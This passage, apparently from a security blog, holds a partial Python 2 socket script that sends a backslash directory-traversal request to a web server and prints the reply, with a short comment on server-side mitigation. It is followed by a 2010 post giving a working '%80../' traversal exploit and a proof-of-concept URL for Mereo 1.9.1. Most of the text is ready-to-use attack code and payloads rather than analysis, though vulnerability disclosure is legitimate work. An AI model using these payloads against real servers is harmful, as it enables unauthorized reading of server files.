# the post notes the path must be relative and the slashes unencoded.
# Server-side mitigation is to normalize the request path (treating '\'
# like '/') before resolving it and to reject anything above the root.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send('GET /' + '\..' * 32 + '/ HTTP/1.1\r\n'
    'Host: ' + host + '\r\n\r\n')

# Print whatever comes back until the server closes the connection.
while 1:
    response = s.recv(8192)
    if not response: break
    print response

Sunday, May 9, 2010

Mereo 1.9.1 Directory Traversal

It's possible to navigate the local file system of a server running Mereo 1.9.1 by using a specially crafted URL.

Exploit: %80../

PoC: http://localhost/%80../%80../%80../%80../%80../%80../%80../%80../